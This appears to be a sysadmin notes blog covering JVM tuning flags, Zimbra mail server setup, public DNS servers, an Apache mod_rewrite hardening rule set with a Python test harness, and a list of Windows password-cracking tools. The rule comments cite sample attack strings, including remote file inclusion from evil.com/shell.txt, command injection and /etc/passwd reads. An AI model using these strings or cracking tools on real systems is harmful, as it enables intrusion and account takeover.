Java tuning

The general tuning guidelines for the Java VM.
Here are some general tuning guidelines to help you categorize the kinds of Java tuning you will perform:
1. Be aware of ergonomics settings
The -server: server compiler
The -XX:+UseParallelGC: parallel garbage collector
The -Xms: initial heap size is 1/64th of the machine’s physical memory
The -Xmx: maximum heap size is 1/4th of the machine’s physical memory (up to 1 GB max)

2. Heap sizing
The maximum heap size of a Java application is limited by these factors:
The process data model (32-bit or 64-bit) on the system.
The amount of physical memory available on the system.
The size of the Java heap for a particular application can never exceed or even reach the maximum
virtual address space of the process data model.

3. Garbage collector policy
The -XX:+UseParallelGC: parallel garbage collector
The -XX:+UseConcMarkSweepGC: concurrent garbage collector (CMS)
The -XX:+UseSerialGC: serial garbage collector ( for smaller applications and systems)

4. Other tuning parameters
The -XX:+UseLargePages: large memory pages.
The -XX:LargePageSizeInBytes:

Examples:
1. Tuning for throughput
Here is an example of specific command-line tuning for a server application
running on a system with 4 GB of memory and capable of running 32 threads simultaneously
(CPUs and cores or contexts).
java -Xmx3800m -Xms3800m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20

2. Try the parallel old generation collector
Similar to example 1 we here want to test the impact of the parallel old generation collector.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20 -XX:+UseParallelOldGC

3. Try 256 MB pages
This tuning example is specific to those Solaris-based systems that would support the huge page size of 256 MB.
java -Xmx2506m -Xms2506m -Xmn1536m -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20 \
  -XX:+UseParallelOldGC -XX:LargePageSizeInBytes=256m

4. Try -XX:+AggressiveOpts
This tuning example is similar to Example 2, but adds the AggressiveOpts option.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20 \
  -XX:+UseParallelOldGC -XX:+AggressiveOpts

5. Try Biased Locking
This tuning example builds on Example 4, and adds the Biased Locking option.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20 \
  -XX:+UseParallelOldGC -XX:+AggressiveOpts -XX:+UseBiasedLocking

6. Tuning for low pause times and high throughput
This tuning example is similar to Example 2, but uses the concurrent garbage collector
(instead of the parallel throughput collector).
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:ParallelGCThreads=20 -XX:+UseConcMarkSweepGC \
  -XX:+UseParNewGC -XX:SurvivorRatio=8 -XX:TargetSurvivorRatio=90 -XX:MaxTenuringThreshold=31

7. Try AggressiveOpts for low pause times and high
This tuning example builds on Example 6, and adds the AggressiveOpts option.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:ParallelGCThreads=20 -XX:+UseConcMarkSweepGC \
  -XX:+UseParNewGC -XX:SurvivorRatio=8 -XX:TargetSurvivorRatio=90 -XX:MaxTenuringThreshold=31 \
  -XX:+AggressiveOpts

 

 

A good start to understand JVM, Heap, Perm Gen and GC collector

JDK 6 Performance Features and Update
GC Collector:

• Serial Collector (-XX:+UseSerialGC)
• Throughput Collectors
  > Parallel Scavenging Collector for Young Gen
    -XX:+UseParallelGC
  > Parallel Compacting Collector for Old Gen
    -XX:+UseParallelOldGC (on by default with ParallelGC in JDK 6)
• Concurrent Collector
  > Concurrent Mark-Sweep (CMS) Collector
    -XX:+UseConcMarkSweepGC
  > Concurrent (Old Gen) and Parallel (Young Gen) Collectors
    -XX:+UseConcMarkSweepGC -XX:+UseParNewGC
• The new G1 Collector as of Java SE 6 Update 14 (-XX:+UseG1GC)

Sample JVM Parameters:

Performance Goals and Exhibits
A) High Throughput (e.g. batch jobs, long transactions)
B) Low Pause and High Throughput (e.g. portal app)
• JDK 6
A) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseParallelGC -XX:ParallelGCThreads=16
B) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:ParallelGCThreads=16
• JDK 5
A) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseParallelGC -XX:ParallelGCThreads=16 -XX:+UseParallelOldGC
-XX:+UseBiasedLocking
B) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:ParallelGCThreads=16
-XX:+UseBiasedLocking
Rule of Thumb on Best selection of

> Garbage Collector (Make sure to override GCThreads)
> Heap Size (-Xms == 1/64 Max Memory or Max Heap and
-Xmx == ¼ Max Memory or Max Heap)
> Runtime Compiler (-server vs -client)
• Desired Goals (This is a hint, not a guarantee)
> Maximum Pause Time (-XX:MaxGCPauseMillis=)
> Application Throughput (-XX:GCTimeRatio= where
Application time = 1 / (1 + n))

Do check out the 1.5 paper, as it comes with sample parameters for high-throughput and low-latency applications.
Java 1.5 Tuning White Paper
If you are using 1.6, check out the differences and improvements in the 1.6 paper; note that the 1.5 parameters still apply to 1.6.

Java SE 6 Performance White Paper

A very practical and easy-to-understand slide deck that walks you through the Sun HotSpot GC tuning tips and take-away parameters.

HotSpot JVM Tuning

Wondering whether the Java thread stack space (Xss) and perm gen (MaxPermSize) are part of the heap space? The answer is NO. That is why the actual Linux memory consumption you see is bigger than your “-Xmx” setting.
Using -Xss to adjust Java default thread stack size to save memory and prevent StackOverflowError

One working set of JVM parameters with JBoss server:

JAVA_OPTS="-server -Xms3072m -Xmx3072m -Xmn2048m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -XX:ParallelGCThreads=8 -XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:SurvivorRatio=8 -XX:TargetSurvivorRatio=90 -XX:MaxTenuringThreshold=31 -XX:+AggressiveOpts -XX:+PrintHeapAtGC -XX:+PrintGCTimeStamps -XX:+PrintGCDetails -XX:+PrintGCApplicationStoppedTime -Xloggc:/opt/jbos/server/default/log/jvmgc.log"

 

 

Advanced JVM Tuning for Low Pause
The standard Java Virtual Machine (JVM) is configured to optimize for throughput. But some systems are more interested in low pause/reduced latency and GC (garbage collection) might be one source of pausing.
(you can read an interesting article about what latency means to your business)

I have found a post on GigaSpaces forum providing some possible JVM configurations to optimize on latency:

-Xms2g -Xmx2g -Xmn150m
-XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode
-XX:+CMSIncrementalPacing -XX:CMSIncrementalDutyCycleMin=10
-XX:CMSIncrementalDutyCycle=50 -XX:ParallelGCThreads=8
-XX:+UseParNewGC -XX:MaxGCPauseMillis=2000
-XX:GCTimeRatio=10 -XX:+DisableExplicitGC
Please note that -XX:+UseConcMarkSweepGC has the heaviest impact on performance – decrease of 40%.

The following set of parameters shows 20% better performance than with -XX:+UseConcMarkSweepGC while the pause size still is below 100msec in embedded test with payload 10KB and 100 threads:

-Xms2g -Xmx2g -Xmn150m
-XX:GCTimeRatio=2 -XX:ParallelGCThreads=8
-XX:+UseParNewGC -XX:MaxGCPauseMillis=2000
-XX:+DisableExplicitGC
While I’m pretty sure that most of the applications do not need such an advanced VM configuration, it is interesting to see what strategies are employed when low latency is needed.

Option: Details
-XX:+UseConcMarkSweepGC: Sets the garbage collector policy to the concurrent (low pause time) garbage collector (also known as CMS)
-XX:+CMSIncrementalMode: Enables the incremental mode (works only with -XX:+UseConcMarkSweepGC)
-XX:+CMSIncrementalPacing: Enables automatic adjustment of the incremental mode duty cycle based on statistics collected while the JVM is running
-XX:CMSIncrementalDutyCycleMin: The percentage (0-100) which is the lower bound on the duty cycle when CMSIncrementalPacing is enabled
-XX:CMSIncrementalDutyCycle: The percentage (0-100) of time between minor collections that the concurrent collector is allowed to run. If CMSIncrementalPacing is enabled, then this is just the initial value.
-XX:ParallelGCThreads: Sets the number of garbage collector threads
-XX:+UseParNewGC: Enables multi-threaded young generation collection.
-XX:MaxGCPauseMillis: A hint to the throughput collector that it’s desirable that the maximum pause time is lower than the given value. (n.b. it looks like this value can also be used with the CMS garbage collector)
-XX:GCTimeRatio: A hint to the virtual machine that it’s desirable that not more than 1 / (1 + GCTimeRatio) of the application execution time be spent in the collector
-XX:+DisableExplicitGC: Disables explicit garbage collection calls (System.gc())
There is no need to learn all these flags by heart as you can find them covered in various documents:

 

 

 

 

Custom settings were:

-Xms768m
-Xmx768m
-XX:NewSize=128m
-XX:MaxNewSize=128m
-XX:+UseParNewGC
-XX:ParallelGCThreads=8
-XX:MaxTenuringThreshold=1
-XX:SurvivorRatio=8
-XX:+UseConcMarkSweepGC
-XX:+CMSParallelRemarkEnabled
-XX:CMSInitiatingOccupancyFraction=65
-XX:+CMSScavengeBeforeRemark
-XX:+UseCMSInitiatingOccupancyOnly
-XX:MaxPermSize=250m
-XX:ReservedCodeCacheSize=64m

Zimbra commands

How to find the host name 

host `hostname`

Domain level blocking of users

 

ZCS8:
zmlocalconfig -e postfix_smtpd_sender_restrictions="hash:/opt/zimbra/postfix/conf/reject"

ZCS8:
Add hash:/opt/zimbra/postfix/conf/reject as the first line of /opt/zimbra/conf/zmconfigd/smtpd_sender_restrictions.cf

user@domain.com REJECT
domainX.com REJECT

Restart zimbra
postmap /opt/zimbra/postfix/conf/reject
zmmtactl stop && zmmtactl start

Enable PHP on Apache

After installing PHP with yum on CentOS or Fedora:

AddModule mod_php.c
LoadModule php_module         modules/mod_php.so
LoadModule php5_module        modules/libphp5.so
AddType application/x-httpd-php .php

And if PHP pages won’t load:

AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

Apache mod_rewrite security rules for Web server hardening

# Hardened Apache Mod_Rewrite Security Rule
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond
# NC = ‘nocase|NC’ (no case-sensitive)
# OR = ‘ornext|OR’ (or next condition)
# L = last rule
RewriteEngine on

# Allow only GET and POST verbs
# ‘Coz most vul scanners use HEAD for hunting buggy files existence
RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]
# Ban Non-GUI Browsers
RewriteCond %{HTTP_USER_AGENT} ^.*(lynx|wget).* [NC,OR]

# Ban Typical Vulnerability Scanners and others

# void of UserAgent
RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR]

# Known Web vulnerability Scanners

RewriteCond %{HTTP_USER_AGENT} ^.*(syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto).* [NC,OR]

# Random Underground Web Exploit Scanners

RewriteCond %{HTTP_USER_AGENT} ^.*(javascript\:alert|0d\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\<script\>|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r).* [NC,OR]
# Denial-of-Service Tool
RewriteCond %{HTTP_USER_AGENT} ^.*(ApacheBench).* [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]

# Disable access to cgi-bins if not used
RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]
# Block out common attack strings
# Additional filtering can be put into
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT

# Directory Traversal, Null Byte Injection, HTTP Response Splitting
RewriteCond %{QUERY_STRING} ^.*(\.\.\/|\.\.%2f|\.\.%5C|\.\.%252F|\.\.%255C|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]

# SQL Injection Probing
RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]
# Remote/Local File Inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR]

# PHP Version Probing
RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]

# XSS Probing
RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR]

# PHP GLOBALS Overriding
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP REQUEST variable Overriding
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

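# PHP Command Injection Probing
# vuln.php?exec=uname -a;ls -al;whoami
# Last condition of the OR chain: no [OR] flag, the deny rule follows directly
RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* [NC]

# Deny access
RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]

# PHP CGI code execution
# Both conditions must hold (no '=' in the query string AND a hyphen present),
# so they are ANDed in a rule of their own; chained with [OR], the first one
# would match every request that has no query string.
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\-

# Deny access
RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]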
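
An added example (not part of the original rule set) for checking these conditions against sample traffic before deploying them: the Python port below evaluates a few of the patterns with mod_rewrite's AND/[OR] chaining. It shows the substring false positive caused by short tokens such as "ass", and what happens when the two PHP CGI conditions are joined to the chain with [OR] instead of being ANDed in a rule of their own. The request dictionaries, user agents and helper names are constructed for illustration.

```python
import re

# One condition = (request field, pattern, OR flag). Patterns are copied from the
# rule set above; lines marked "excerpt" carry a shortened token list.
CHAIN = [
    ("method", r"!^(GET|POST)$", True),
    ("ua", r"^.*(lynx|wget).*", True),
    ("ua", r"^()$", True),
    ("ua", r"^.*(sqlmap|w3af|acunetix|nikto).*", True),  # excerpt
    ("ua", r"^.*(libwww|perl|java|curl|ruby|python|scan|ass|hack).*", True),  # excerpt
    ("query", r"^.*(\.\.\/|\.\.%2f|%00|%0D%0A)", True),  # excerpt
    ("query", r"^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT).*", True),  # excerpt
    ("query", r"^.*(or|and)%20([0-9]=[0-9]).*", True),
    ("query", r"^.*(\<|%3C).*script.*(\>|%3E)", True),
    ("query", r"^.*(=|;)(uname%20-|ls%20-|whoami).*", False),
]
PHP_CGI = [
    ("query", r"^[^=]*$", False),
    ("query", r"%2d|\-", False),
]
# Layout A: the PHP CGI pair ANDed in a rule of its own.
SPLIT = [CHAIN, PHP_CGI]
# Layout B: a single chain, with the pair joined to it by [OR].
JOINED = [[(f, p, True) for f, p, _ in CHAIN]
          + [("query", r"^[^=]*$", True), ("query", r"%2d|\-", False)]]


def cond_matches(cond, request):
    """Test one condition; a leading '!' negates it. Matching is case-insensitive,
    as with [NC] (applied to every condition here for simplicity)."""
    field, pattern, _ = cond
    negate = pattern.startswith("!")
    if negate:
        pattern = pattern[1:]
    hit = re.search(pattern, request[field], re.IGNORECASE) is not None
    return hit != negate


def rule_fires(conds, request):
    """Conditions are ANDed; a condition flagged [OR] is ORed with the next one."""
    i = 0
    while i < len(conds):
        ok = cond_matches(conds[i], request)
        if conds[i][2]:
            if ok:
                # One member of the OR group matched: skip the rest of the group.
                while i < len(conds) and conds[i][2]:
                    i += 1
        elif not ok:
            return False
        i += 1
    return True


def denied(request, rules):
    return any(rule_fires(conds, request) for conds in rules)


def matching_conditions(request, rules):
    """Patterns that match on their own, for tracing which condition caused a block."""
    return [c[1] for conds in rules for c in conds if cond_matches(c, request)]


# Constructed sample requests (not taken from real logs).
BROWSER = "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
SAMPLES = {
    "plain page": {"method": "GET", "ua": BROWSER, "query": ""},
    "hyphen in value": {"method": "GET", "ua": BROWSER, "query": "lang=en-US"},
    "HEAD request": {"method": "HEAD", "ua": BROWSER, "query": ""},
    "scanner UA": {"method": "GET", "ua": "sqlmap/1.7 (constructed)", "query": "id=1"},
    "traversal": {"method": "GET", "ua": BROWSER, "query": "page=../../etc/passwd"},
    "php-cgi switch": {"method": "GET", "ua": BROWSER, "query": "-s"},
    "substring false positive": {
        "method": "GET",
        "ua": "Mozilla/5.0 (Windows NT 10.0) ClassroomBrowser/3.1",
        "query": "",
    },
}


def report():
    """Map each sample name to (denied with layout A, denied with layout B)."""
    return {name: (denied(req, SPLIT), denied(req, JOINED))
            for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (split, joined) in report().items():
        print(f"{name:26s} own rule: {split!s:5s}  joined with [OR]: {joined}")
```

With the pair joined by [OR], the ordinary page request and the "lang=en-US" request are both denied; the "ClassroomBrowser" user agent is denied in either layout because "ass" matches as a substring.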

 

 

Public DNS to speed up your connection


Google DNS

The Google DNS servers are very simple to memorize and very stable:

8.8.8.8
8.8.4.4

Open DNS

They are very popular, and the nature and philosophy of these DNS servers is that they are open and that we can control them:

208.67.222.222
208.67.220.220

OpenNIC

It is also a free alternative, and it promises to remove the IP addresses from its navigation logs after 24 hours.

202.83.95.227
216.87.84.211
64.0.55.201
184.154.13.11

Level 3 Communications

Response times are the best in the market:

4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
4.2.2.6

Norton ConnectSafe

Security company Symantec has created a series of secure DNS servers that offer several options:

Extra security against malware and phishing attacks.

198.153.192.40
198.153.194.40

Apart from the above protection, these also filter content (adult, drugs, etc.):

198.153.192.50
198.153.194.50

If you want to add the strictest content filtering, suitable for the whole family, you can use:

198.153.192.60
198.153.194.60

Mnemonic: the protection level goes up with the last figure: 40 is the lowest (security only), 50 is the middle level (security and content filtering), and 60 is the level suited to children's computers.

Dyn Internet Guide

These DNS servers promise good availability plus extra protection, filtering out sites verified as malicious.

216.146.35.35
216.146.36.36

ZIMBRA INSTALLATION

Zimbra Collaboration Server 8 is amazing; it’s a fresh take, away from the rough hands of Microsoft Exchange. And most importantly, the open-source version has everything that I need. I’ve used it commercially and do recommend it to any clients as it’s just a great platform.

Installation of Zimbra is very easy. I’ve left the comments from my notes to make it easier to understand.
The installation is from a CentOS 6.3 minimal install after doing my routine secure, hardening and updates.

yum -y update

yum -y install wget setuptool system-config-network system-config-firewall ntsysv nscd perl nc sudo sysstat

yum install system-config-network-tui
yum install system-config-firewall-tui
yum install nc
yum install sudo
yum install mysql mysql-server mysql-devel
yum install sysstat
yum install wget
yum install bind bind-utils

 

setup # disable services iptables, sendmail
service iptables stop
service sendmail stop

chkconfig sendmail off
chkconfig netfs off
chkconfig rpcbind off
chkconfig rpcgssd off
chkconfig rpcidmapd off
chkconfig fcoe off
chkconfig iptables off
chkconfig ip6tables off
chkconfig iscsi off
chkconfig iscsid off

 

# Disable Startup Services
service postfix stop
chkconfig postfix off
service sendmail stop
chkconfig sendmail off
# Install nc package
yum -y install nc sysstat
# Disable Selinux (unfortunately, Zimbra does not yet fully support Selinux)
setenforce 0
nano /etc/selinux/config
# Modify
SELINUX=disabled
# Fix hosts file
nano /etc/hosts
# Append
ipaddress hostname.domain.com hostname

echo "0 4 * * * root ntpdate time.stdtime.gov.tw" >> /etc/crontab

 

# Installing Zimbra Opensource
wget http://files2.zimbra.com/downloads/8.0.2_GA/zcs-8.0.2_GA_5569.RHEL6_64.20121210115059.tgz
tar -zxvf zcs-8.0.2_GA_5569.RHEL6_64.20121210115059.tgz
cd zcs-8.0.2_GA_5569.RHEL6_64.20121210115059
# Centos isn’t officially supported but RHEL 6 is so we platform-override
# # THIS WILL TAKE A WHILE ##
# This is run in screen as it may take a while #
# depending on your machine, go grab a coffee #
# You can close the screen with ctrl+A+D and
# continue with your other operations #
# If you get disconnected or want to #
# return to the screen simply use $screen -R #
# Configuration steps following this are very self explanatory #
#
screen ./install.sh --platform-override

Step 4. Install Zimbra 8
# cd zcs-8.0.0_GA_5434.RHEL6_64.20120907144639
# ./install.sh --platform-override
Q1. Do you agree with the terms of the software license agreement? [N] Y
Q2. Do you agree with the terms of the software license agreement? [N] Y
Q3. Install zimbra-ldap [Y] Enter
Q4. Install zimbra-logger [Y] Enter
Q5. Install zimbra-mta [Y] Enter
Q6. Install zimbra-snmp [Y] Enter
Q7. Install zimbra-store [Y] Enter
Q8. Install zimbra-apache [Y] Enter
Q9. Install zimbra-spell [Y] Enter
Q10. Install zimbra-memcached [N] Enter
Q11. Install zimbra-proxy [N] Enter
Q12. Install anyway? [N] Y
Q13.The system will be modified. Continue? [N] Y
Q14. Address unconfigured (**) items (? – help) 3
Q15. Select, or ‘r’ for previous menu [r] 4
Q16. Password for admin@zimbra.iwant-in.net (min 6 characters): [KFAYdeL6]
Q17. Select, or ‘r’ for previous menu [r] r
Q18. Select from menu, or press ‘a’ to apply config (? – help) a
Q19. Save configuration data to a file? [Yes] Enter
Q20. Save config in file: [/opt/zimbra/config.8480] Enter
Q21. The system will be modified – continue? [No] Yes
Q22. Notify Zimbra of your installation? [Yes] No
Q23. Configuration complete – press return to exit Enter

# Optimization on Lower Memory

su zimbra

zmcontrol status

su zimbra
zmlocalconfig -e tomcat_java_heap_memory_percent=40
zmlocalconfig -e mysql_memory_percent=10
zmlocalconfig -e mysql_table_cache=250
zmlocalconfig -e mailboxd_java_heap_memory_percent=10
zmlocalconfig -e zmmtaconfig_interval=7200
zmmtactl restart

# Using -l option connects to LDAP Server Instead, Fixes the issue with connecting through soap
# Disable Logger Service, Stats and SNMP
# THIS IS ONLY FOR MY LOW MEMORY SETUP. Not recommended for production use.

zmprov -l ms mail.domain.com -zimbraServiceEnabled snmp
zmprov -l ms mail.domain.com -zimbraServiceEnabled logger
zmprov -l ms mail.domain.com -zimbraServiceEnabled stats
zmcontrol stop
zmcontrol start
zmlocalconfig -e zmmtaconfig_interval=7200
zmprov -l mcf zimbraLogRawLifetime 7d
zmprov -l mcf zimbraLogSummaryLifetime 30d
zmmtactl restart

nano /opt/zimbra/conf/my.cnf in:
# Modify
# thread_cache_size = 110
# max_connections = 110

thread_cache_size = 20
max_connections = 20

nano /opt/zimbra/conf/amavisd.conf.in
# Modify
# $max_servers = 10;
$max_servers = 2;

# Configure Iptables Firewall
# enable zimbra ports
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 25 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 110 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 143 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 389 -j ACCEPT # -s 10.10.3.0/24
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 465 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 993 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 995 -j ACCEPT
iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 7071 -j ACCEPT # -s 10.10.3.0/24

And that’s it. Do check out the Zimbra website for a full list of features. Unfortunately, it is quite memory and CPU intensive, and it’s not comparable to the simple Postfix and SquirrelMail setups that some may be used to.

But the feature range is amazing and definitely worth a look into for those on the fence.

 

Adding my own WildCard SSL Certificate to Zimbra Collaboration Server 8
Installation of Zimbra is a breeze; on my CentOS 6.3 Minimal install it took less than 5 minutes of interaction.

Getting the SSL certificate installed took a little more tweaking than the install, but after some trial and error the final list of commands was very short.

cp /opt/zimbra/ssl/zimbra/ca.pem /opt/zimbra/ssl/zimbra/ca.pem.bak
# Empty the existing file
cat /dev/null > /opt/zimbra/ssl/zimbra/ca.pem
nano /opt/zimbra/ssl/zimbra/ca/ca.pem
# Insert our ca.pem here, only the certificate not the key
nano /opt/zimbra/ssl/zimbra/commercial/commercial.key
# Insert the .key file contents
nano /opt/zimbra/ssl/zimbra/commercial/commercial_ca.crt
# Insert the .crt file contents

# Now we’ll deploy our crt, telling Zimbra it’s a commercial cert (although it’s not)
/opt/zimbra/bin/zmcertmgr deploycrt comm /opt/zimbra/ssl/zimbra/ca/ca.pem

# Verify the installed cert
/opt/zimbra/bin/zmcertmgr viewdeployedcrt

# Force SSL with a redirect
zmtlsctl redirect

# Restart
zmcontrol stop
zmcontrol start

 

At command prompt type

su zimbra

zmcontrol status

To start the zimbra services type:
zmcontrol start

Open a browser and log in at http://mail.server.com

For admin panel type: http://mail.server.com:7071

 

Change Zimbra Web Client Logo and Title
Logo Path –> /opt/zimbra/jetty/webapps/zimbra/skins/_base/logos
Logo Files –> AppBanner.png
Title Defined Path –> /opt/zimbra/jetty/webapps/zimbra/WEB-INF/classes/messages/ZmMsg.properties
Title Desc –> zimbraTitle = IWANT-IN WebMail
zimbraLabel = IWANT-IN WebMail\uff1a

 

# su - zimbra

Then just run:

$ zmprov -l -v mcf zimbraXMPPEnabled TRUE
$ zmprov -v mc default zimbraFeatureIMEnabled TRUE
$ zmprov -v mc default zimbraFeatureInstantNotify TRUE
$ zmcontrol stop
$ zmcontrol start

 

Free Windows Password Recovery Tools

Windows password recovery tools are used to recover, or reset lost user and administrator passwords used to log on to Windows operating systems.

Password recovery tools are often called “password cracker” tools because they are sometimes used to “crack” passwords by hackers. Legally cracking or unlocking your own Windows password is certainly a legitimate practice!

Note: Using a Windows password recovery program is just one of several ways to find a lost Windows password.

Important: Please read my Windows Password Recovery Programs FAQ for more information. I also have an easy-to-read comparison of these programs too that might help.

Need to Crack a Different Kind of Password? See my list of free password crackers for free programs to crack PDF files, Word & Excel documents, RAR & ZIP archives, and more.
Here are the top 7 free Windows password recovery programs available. I also keep a list of premium Windows password recovery tools.

 

1. Ophcrack

Ophcrack Version 3.3.1 - LiveCD Version 2.3.1
The Ophcrack Windows password cracker is by far the best free Windows password recovery tool available. It’s fast and easy enough for a first time Windows password cracker with a basic knowledge of Windows.

With Ophcrack, you don’t need any access to Windows to be able to recover your lost passwords. Simply visit the site, download the free ISO image, burn it to a CD and boot from the CD. The Ophcrack program starts, locates the Windows user accounts, and proceeds to recover (crack) the passwords – all automatically.

In a test on a Windows 7 PC, Ophcrack recovered the 10-character password to my administrator account in 40 seconds. Ophcrack supports Windows 7, Windows Vista, and Windows XP.

 
 

2. Offline NT Password & Registry Editor

Download Offline NT Password & Registry Editor Password Recovery

Offline NT Password & Registry Editor works differently than most password recovery programs in that it erases your Windows password instead of recovering it. You can think of it as more of a Windows password reset tool.

Like Ophcrack, you boot to a burned CD created with the Offline NT Password & Registry Editor ISO file. After running the program, you can log in to your Windows account without entering a password at all.

If you like this “password deleting” strategy then I highly recommend this program. Offline NT Password & Registry Editor works basically the same way as PC Login Now, listed below.
I tried Offline NT Password & Registry Editor on a Windows 7 PC and it reset the password immediately without problem. It should work equally well with Windows 7, Windows Vista, Windows 2000, and Windows NT. It should also work with 64-bit versions of these operating systems.

 

 
 

3. PC Login Now

 

PC Login Now Free Password Recovery Software
PC Login Now is one of the better free Windows password recovery programs I’ve tested… even though it doesn’t actually recover passwords.

Instead of discovering and displaying your current Windows password, PC Login Now deletes it, allowing you to access Windows without a password, after which you can create a new one.

PC Login Now works just like the free and popular Offline NT Password & Registry Editor (listed above) only it’s much easier to use.

The trade-off with PC Login Now over Offline NT Password & Registry Editor is that PC Login Now causes Windows to detect a possible hard drive problem on the first reboot after deleting the password. I’ve never seen nor heard of a problem actually happening but it’s still a little bothersome.

In a test on a Windows 7 PC, PC Login Now deleted the 15-character password to my user account instantly. PC Login Now supports Windows 7, Windows Vista, and Windows XP.

 

 
 
 
 

4. Kon-Boot

Download Kon-Boot 1.0
Kon-Boot is yet another free password reset program, much like ONTP&RE and PC Login Now. Just burn the program to a disc, boot to it, and you’re off.

Kon-Boot works differently than the two password reset tools above, so if you have problems using them, give Kon-Boot a try. It’s very, very easy to use and probably the fastest password reset, and certainly password recovery, tool available.

Unfortunately, Kon-Boot 1.0 does not work with 64-bit versions of Windows.

I used Kon-Boot v1.0 to successfully delete the password on a Windows Vista PC and then also on a Windows XP PC. Kon-Boot is reported to also reset Windows 7 passwords but I was not able to make it work on two different Windows 7 PCs.

 

 

 

5. Cain & Abel

Cain & Abel Password Cracker
Cain & Abel is a free, fast and effective Windows password recovery tool.
Unlike Ophcrack and other popular Windows password hacking programs, Cain & Abel requires access to Windows under an administrator account. Due to this fact, Cain & Abel is a valuable resource to recover passwords to accounts other than the one you’re using.

Add that to the fact that Cain & Abel is a bit more complicated to use than other password recovery apps and you have what is, in my book, a pretty advanced tool. Check it out if you think it might be useful to you.

